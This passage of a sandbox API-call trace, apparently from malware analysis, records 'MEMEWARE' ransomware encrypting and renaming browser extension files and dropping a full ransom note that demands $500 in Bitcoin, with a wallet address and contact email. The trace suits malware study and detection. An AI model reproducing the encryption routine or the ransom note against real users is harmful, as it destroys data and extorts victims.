CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.832] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.832] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.836] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json") returned 164 [0083.836] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.836] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json") returned 164 [0083.836] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.836] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json") returned 164 [0083.836] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.836] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.841] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.841] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.841] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.841] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.842] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.842] CloseHandle (hObject=0x168) returned 1 [0083.842] wnsprintfW (in: 
pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json.protected") returned 174 [0083.842] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json.protected")) returned 1 [0083.843] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.843] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.843] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\RESTORE_FILES.txt") returned 168 [0083.843] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.843] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.843] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.844] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.844] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.844] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.844] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.844] CloseHandle (hObject=0x164) returned 1 [0083.845] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.845] lstrcmpiW (lpString1="lv", lpString2="Windows") returned -1 [0083.845] lstrcmpiW (lpString1="lv", lpString2="Program Files") returned -1 [0083.845] lstrcmpiW (lpString1="lv", lpString2="Program Files (x86)") returned -1 [0083.845] lstrcmpiW (lpString1="lv", lpString2="$Recycle.bin") returned 1 [0083.845] lstrcmpiW (lpString1="lv", lpString2="System Volume Information") returned -1 [0083.845] wnsprintfW 
(in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv") returned 150 [0083.845] lstrcmpW (lpString1="lv", lpString2=".") returned 1 [0083.845] lstrcmpW (lpString1="lv", lpString2="..") returned 1 [0083.845] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\*") returned 152 [0083.845] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.845] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.845] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.845] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.845] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.845] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.845] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\.") returned 152 [0083.845] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.845] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.845] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.845] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.845] lstrcmpiW (lpString1="..", lpString2="Program 
Files (x86)") returned -1 [0083.845] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.845] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.845] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\..") returned 153 [0083.845] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.845] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.845] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.845] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.846] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.846] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.846] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.846] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.846] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json") returned 164 [0083.846] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.846] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.846] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.846] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.846] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.848] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json") returned 164 [0083.849] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.849] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json") returned 164 [0083.849] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.849] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json") returned 164 [0083.849] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.849] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.853] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.853] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: 
lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.854] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.854] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.854] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.854] CloseHandle (hObject=0x168) returned 1 [0083.854] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json.protected") returned 174 [0083.854] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json.protected")) returned 1 [0083.855] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) 
returned 0 [0083.855] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.856] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\RESTORE_FILES.txt") returned 168 [0083.856] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.856] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.856] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.857] lstrlenA (lpString="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") returned 684 [0083.857] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.857] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.857] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0083.857] CloseHandle (hObject=0x164) returned 1 [0083.857] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.857] lstrcmpiW (lpString1="ml", lpString2="Windows") returned -1 [0083.857] lstrcmpiW (lpString1="ml", lpString2="Program Files") returned -1 [0083.858] lstrcmpiW (lpString1="ml", lpString2="Program Files (x86)") returned -1 [0083.858] lstrcmpiW (lpString1="ml", lpString2="$Recycle.bin") returned 1 [0083.858] lstrcmpiW (lpString1="ml", lpString2="System Volume Information") returned -1 [0083.858] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml") returned 150 [0083.858] lstrcmpW (lpString1="ml", lpString2=".") returned 1 [0083.858] lstrcmpW (lpString1="ml", lpString2="..") returned 1 [0083.858] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\*") returned 152 [0083.858] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.858] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.858] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.858] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.858] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.858] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.858] wnsprintfW (in: pszDest=0xd010e0, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\.") returned 152 [0083.858] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.858] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.858] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.858] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.858] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.858] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.858] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.858] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\..") returned 153 [0083.858] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.858] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.858] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.858] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.858] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.858] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.858] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.858] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.858] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json") returned 164 [0083.858] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.858] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.858] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.858] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.859] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.859] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 